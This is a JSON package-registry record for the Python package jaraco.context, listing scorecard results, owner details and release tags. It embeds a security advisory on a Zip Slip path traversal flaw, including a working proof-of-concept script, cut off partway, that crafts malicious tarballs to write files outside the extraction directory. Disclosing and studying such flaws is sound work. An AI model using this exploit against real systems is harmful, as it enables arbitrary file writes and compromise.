settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36801458,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"jaraco","name":"Jason R. Coombs","uuid":"308610","kind":"user","description":"","email":"jaraco@jaraco.com","website":"https://www.jaraco.com","location":"Pittsburgh, PA, USA","twitter":"jaraco","company":null,"icon_url":"https://avatars.githubusercontent.com/u/308610?u=5b3fdef94d1b0ac7392d17643eaba029f5f13bea\u0026v=4","repositories_count":234,"last_synced_at":"2026-08-22T00:11:51.471Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/jaraco","funding_links":["https://github.com/sponsors/jaraco"],"total_stars":5443,"followers":749,"following":5,"created_at":"2022-11-02T16:21:31.721Z","updated_at":"2026-08-22T00:11:51.517Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco/repositories"},"tags":[{"name":"v6.1.2","sha":"098f39c911d4504b2c718f2ff483ae24f1c4d378","kind":"tag","published_at":"2026-03-20T22:10:56.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2/manifests"},{"name":"v6.1.1","sha":"47979d7b6a55353170f61f3e54d17f5973cb8e1c","kind":"tag","published_at":"2026-03-07T15:43:22.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1/manifests"},{"name":"v6.1.0","sha":"675aaf5bfb926bdafcded1b0e08ca011d6e0f599","kind":"tag","published_at":"2026-01-13T02:49:19.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0/manifests"},{"name":"v6.0.2","sha":"1fe5de1e450556cc68d1d33198f8c7b8791af42d","kind":"tag","published_at":"2025-12-24T19:18:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2/manifests"},{"name":"v6.0.1","sha":"088151eb92eaf8801d027e126d4f7a262e422424","kind":"tag","published_at":"2024-08-20T03:35:36.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1/manifests"},{"name":"v6.0.0","sha":"d892f531d6707f46ef1981f5ca7a7309ed4d3005","kind":"tag","published_at":"2024-07-26T21:08:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0/manifests"},{"name":"v5.3.0","sha":"e0e9224b3dbe6520c986bf41820f882160dd55ab","kind":"tag","published_at":"2024-04-06T22:57:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0/manifests"},{"name":"v5.2.0","sha":"c23c888c869bfb693246f69ba512aaede5b0438b","kind":"tag","published_at":"2024-04-06T14:42:52.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"0a1e1492aef2455f60f9b4f364551f0b4926da41","kind":"tag","published_at":"2024-04-04T23:18:01.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"eb865a132d3f801335f8b46b4de2d64d4e16e4b4","kind":"tag","published_at":"2024-04-04T18:56:02.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0/manifests"},{"name":"v4.3.0","sha":"0e0ae08919b984e3c7cffdb2106e437d0d0891c8","kind":"tag","published_at":"2023-01-19T15:28:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"7e22446a66f13140c0cfc7df3f36c162f11f3b5a","kind":"tag","published_at":"2023-01-18T18:06:43.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"5bf0042ef434aa8924a771a405ae29e4c0110c1e","kind":"tag","published_at":"2022-11-19T03:06:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0/manifests"},{"name":"v4.1.2","sha":"c3a9b7393ed9479dab7b02a44242ae2b017c4933","kind":"tag","published_at":"2022-07-14T05:04:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"4d09b48ade8acc32e3453da928ad1eec5158a5a0","kind":"tag","published_at":"2021-10-31T17:18:09.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"866a1b35d416ca6855f2d068072af53cbf255cc3","kind":"tag","published_at":"2021-10-31T17:08:46.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0/manifests"},{"name":"v4.0.0","sha":"23d17bf1f04b83ef34c8cd0e67d26c2e323f5a58","kind":"tag","published_at":"2021-01-29T02:38:28.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"e2bb8bd3fe8b3b3ed4a50c4a9f4f1998739bf276","kind":"tag","published_at":"2020-01-10T08:35:45.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v3.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0/manifests"},{"name":"2.0","sha":"105f81a6204d3a9fbb848675d62be4ef185f36f2","kind":"tag","published_at":"2019-01-01T15:40:50.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0/manifests"},{"name":"1.8","sha":"193b5a60581b5a63c3d955e002319f114f9a7c8b","kind":"tag","published_at":"2018-11-08T16:42:27.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.8","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8/manifests"},{"name":"1.7","sha":"d7866113d8d79a541c1f87e2eae975d23d2500ba","kind":"tag","published_at":"2017-11-28T19:27:39.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.7","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7/manifests"},{"name":"1.6.1","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:32:35.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1/manifests"},{"name":"1.6","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:19:34.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6/manifests"},{"name":"1.5.2","sha":"9660d84625f7d27f47f23bd33a1e88c6c59c5384","kind":"commit","published_at":"2015-10-30T15:02:08.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2/manifests"},{"name":"1.5.1","sha":"51add8c320bb1869d339ddb5d3e0b0df5185b431","kind":"commit","published_at":"2015-10-30T15:02:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1/manifests"},{"name":"1.5","sha":"df1e66e6ff30ee0622b1eb822a4d2ba1663b4ba5","kind":"commit","published_at":"2015-10-30T13:32:37.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5/manifests"},{"name":"1.4","sha":"41a57fcc069952a9925b0ac44d66317d679b8e01","kind":"commit","published_at":"2015-10-30T12:59:05.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.4","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4/manifests"},{"name":"1.3","sha":"89a04a5a4b02f92546eb2bc2bd254dabbd148359","kind":"commit","published_at":"2015-02-22T20:18:53.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.3","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3/manifests"},{"name":"1.2","sha":"a3363e1918bab3d2b260179f229706296509c1c0","kind":"commit","published_at":"2015-02-16T00:58:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2/manifests"},{"name":"1.1","sha":"115a8978616e766daace2e0cd50c5db437f3785e","kind":"commit","published_at":"2014-06-17T18:32:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1/manifests"},{"name":"1.0","sha":"d5be3e1a933b97068f31930f3eeb210895d145e9","kind":"commit","published_at":"2014-02-16T08:42:48.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0/manifests"}]},"repo_metadata_updated_at":"2026-08-24T17:59:26.936Z","dependent_packages_count":55,"downloads":204017897,"downloads_period":"last-month","dependent_repos_count":421,"rankings":{"downloads":0.3758660078682047,"dependent_repos_count":0.7027342542890824,"dependent_packages_count":0.6154515346224875,"stargazers_count":25.079746033684113,"forks_count":16.886318022603614,"docker_downloads_count":0.017544227663051665,"average":7.279610013455092},"purl":"pkg:pypi/jaraco.context","advisories":[{"uuid":"GSA_kwCzR0hTQS01OHB2LThqOHgtOXZqMs4ABRC2","url":"https://github.com/advisories/GHSA-58pv-8j8x-9vj2","title":"jaraco.context Has a Path Traversal Vulnerability","description":"### Summary\nThere is a Zip Slip path traversal vulnerability in the jaraco.context package affecting setuptools as well, in `jaraco.context.tarball()` function. The vulnerability may allow attackers to extract files outside the intended extraction directory when malicious tar archives are processed.\nThe strip_first_component filter splits the path on the first `/` and extracts the second component, while allowing `../` sequences. Paths like `dummy_dir/../../etc/passwd` become `../../etc/passwd`.\nNote that this suffers from a nested tarball attack as well with multi-level tar files such as `dummy_dir/inner.tar.gz`, where the inner.tar.gz includes a traversal `dummy_dir/../../config/.env` that also gets translated to `../../config/.env`.\n\nThe code can be found:\n- https://github.com/jaraco/jaraco.context/blob/main/jaraco/context/__init__.py#L74-L91\n- https://github.com/pypa/setuptools/blob/main/setuptools/_vendor/jaraco/context.py#L55-L76 (inherited)\n\nThis report was also sent to setuptools maintainers and they asked some questions regarding this.\n\nThe lengthy answer is:\n\nThe vulnerability seems to be the `strip_first_component` filter function, not the tarball function itself and has the same behavior on any tested Python version locally (from 11 to 14, as I noticed that there is a backports conditional for the tarball).\nThe stock tarball for Python 3.12+ is considered not vulnerable (until proven otherwise 😄) but here the custom filter seems to overwrite the native filtering and introduces the issue - while overwriting the updated secure Python 3.12+ behavior and giving a false sense of sanitization.\n\nThe short answer is:\n\nIf we are talking about Python \u003c 3.12 the tarball and jaraco implementations /  behaviors are relatively the same but for Python 3.12+ the jaraco implementation overwrites the native tarball protection.\n\nSampled tests:\n\u003cimg width=\"1634\" height=\"245\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ce6c0de6-bb53-4c2b-818a-d77e28d2fbeb\" /\u003e\n\n### Details\n\nThe flow with setuptools in the mix:\n```\nsetuptools._vendor.jaraco.context.tarball() \u003e req = urlopen(url) \u003e with tarfile.open(fileobj=req, mode='r|*') as tf: \u003e tf.extractall(path=target_dir, filter=strip_first_component) \u003e strip_first_component (Vulnerable)\n```\n\n### PoC\n\nThis was tested on multiple Python versions \u003e 11 on a Debian GNU 12 (bookworm).\nYou can run this directly after having all the dependencies:\n```py\n#!/usr/bin/env python3\nimport tarfile\nimport io\nimport os\nimport sys\nimport shutil\nimport tempfile\nfrom setuptools._vendor.jaraco.context import strip_first_component\n\n\ndef create_malicious_tarball(traversal_to_root: str):\n    tar_data = io.BytesIO()\n    with tarfile.open(fileobj=tar_data, mode='w') as tar:\n        # Create a malicious file path with traversal sequences\n        malicious_files = [\n            # Attempt 1: Simple traversal to /tmp\n            {\n                'path': f'dummy_dir/{traversal_to_root}tmp/pwned_by_zipslip.txt',\n                'content': b'[ZIPSLIP] File written to /tmp via path traversal!',\n                'name': 'pwned_via_tmp'\n            },\n            # Attempt 2: Try to write to home directory\n            {\n                'path': f'dummy_dir/{traversal_to_root}home/pwned_home.txt',\n                'content': b'[ZIPSLIP] Attempted write to home directory',\n                'name': 'pwned_via_home'\n            },\n            # Attempt 3: Try to write to current directory parent\n            {\n                'path': 'dummy_dir/../escaped.txt',\n                'content': b'[ZIPSLIP] File in parent directory!',\n                'name': 'pwned_escaped'\n            },\n            # Attempt 4: Legitimate file for comparison\n            {\n                'path': 'dummy_dir/legitimate_file.txt',\n                'content': b'This file stays in target directory',\n                'name': 'legitimate'\n            }\n        ]\n        for file_info in malicious_files:\n            content = file_info['content']\n            tarinfo = tarfile.TarInfo(name=file_info['path'])\n            tarinfo.size = len(content)\n            tar.addfile(tarinfo, io.BytesIO(content))\n\n    tar_data.seek(0)\n    return tar_data\n\n\ndef exploit_zipslip():\n    print(\\\"[*] Target: setuptools._vendor.jaraco.context.tarball()\\\")\n\n    # Create temporary directory for extraction\n    temp_base = tempfile.mkdtemp(prefix=\\\"zipslip_test_\\\")\n    target_dir = os.path.join(temp_base, \\\"extraction_target\\\")\n\n    try:\n        os.mkdir(target_dir)\n        print(f\\\"[+] Created target extraction directory: {target_dir}\\\")\n\n        target_dir_abs = os.path.abspath(target_dir)\n        print(target_dir_abs)\n        depth_to_root = len([p for p in target_dir_abs.split(os.sep) if p])\n        traversal_to_root = \\\"../\\\" * depth_to_root\n        print(f\\\"[+] Using traversal_to_root prefix: {traversal_to_root!r}\\\")\n\n        # Create malicious tarball\n        print(\\\"[*] Creating malicious tar archive...\\\")\n        tar_data = create_malicious_tarball(traversal_to_root)\n\n        try:\n            with tarfile.open(fileobj=tar_data, mode='r') as tf:\n                for member in tf:\n                    # Apply the ACTUAL vulnerable function from setuptools\n                    processed_member = strip_first_component(member, target_dir)\n                    print(f\\\"[*] Extracting: {member.name:40} -\u003e {processed_member.name}\\\")\n\n                    # Extract to target directory\n                    try:\n                        tf.extract(processed_member, path=target_dir)\n                        print(f\\\"    ✓ Extracted successfully\\\")\n                    except (PermissionError, FileNotFoundError, OSError) as e:\n                        print(f\\\"    ! {type(e).__name__}: Path traversal ATTEMPTED\\\")\n        except Exception as e:\n            print(f\\\"[!] Extraction raised exception: {type(e).__name__}: {e}\\\")\n\n        # Check results\n        print(\\\"[*] Checking for extracted files...\\\")\n\n        # Check target directory\n        print(f\\\"[*] Files in target directory ({target_dir}):\\\")\n        if os.path.exists(target_dir):\n            for root, _, files in os.walk(target_dir):\n                level = root.replace(target_dir, '').count(os.sep)\n                indent = ' ' * 2 * level\n                print(f\\\"{indent}{os.path.basename(root)}/\\\")\n                subindent = ' ' * 2 * (level + 1)\n                for file in files:\n                    filepath = os.path.join(root, file)\n                    try:\n                        with open(filepath, 'r') as f:\n                            content = f.read()[:50]\n                        print(f\\\"{subindent}{file}\\\")\n                        print(f\\\"{subindent}  └─ {content}...\\\")\n                    except:\n                        print(f\\\"{subindent}{file} (binary)\\\")\n        else:\n            print(f\\\"[!] Target directory not found!\\\")\n\n        print()\n        print(\\\"[*] Checking for traversal attempts...\\\")\n        print()\n\n        # Check if files escaped\n        traversal_attempts = [\n            (\\\"/tmp/pwned_by_zipslip.txt\\\", \\\"Escape to /tmp\\\"),\n            (os.path.expanduser(\\\"~/pwned_home.txt\\\"), \\\"Escape to home\\\"),\n            (os.path.join(temp_base, \\\"escaped.txt\\\"), \\\"Escape to parent\\\"),\n        ]\n\n        escaped = False\n        for check_path, description in traversal_attempts:\n            if os.path.exists(check_path):\n                print(f\\\"[+] Path Traversal Confirmed: {description}\\\")\n                print(f\\\"      File created at: {check_path}\\\")\n                try:\n                    with open(check_path, 'r') as f:\n                        content = f.read()\n                    print(f\\\"      Content: {content}\\\")\n                    print(f\\\"      Removing: {check_path}\\\")\n                    os.remove(check_path)\n                except Exception as e:\n                    print(f\\\"      Error reading: {e}\\\")\n                escaped = True\n            else:\n                print(f\\\"[-] OK: {description} - No escape detected\\\")\n\n        if escaped:\n            print(\\\"[+] EXPLOIT SUCCESSFUL - Path traversal vulnerability confirmed!\\\")\n        else:\n            print(\\\"[-] No path traversal detected (mitigation in place)\\\")\n\n    finally:\n        